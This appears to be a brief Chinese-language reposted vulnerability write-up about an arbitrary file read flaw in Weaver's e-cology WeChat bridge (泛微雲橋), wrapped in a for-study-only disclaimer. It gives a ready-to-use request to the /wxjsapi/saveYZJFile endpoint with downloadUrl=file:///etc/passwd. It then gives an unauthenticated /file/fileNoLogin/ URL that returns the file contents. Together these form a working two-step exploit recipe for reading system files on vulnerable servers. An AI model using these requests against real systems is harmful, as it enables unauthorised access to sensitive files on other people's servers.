泛微雲橋 任意文件讀取


請遵守網絡安全法!!!本文僅供學習交流使用!用於任何非授權滲透、非法目的攻擊、從事非法活動均與筆者無關!讀者自行承擔其惡果!

主要成因

/wxjsapi/saveYZJFil接口獲取filepath,返回數據包內出現了程序的絕對路徑,攻擊者可以此下載相關敏感文件

構造如下語句

http://x.x.x.x/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt

獲取id值如下

通過id值獲取文件內容

http://x.x.x.x/file/fileNoLogin/xxxxxxxxxxxxxxxddfc7e


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM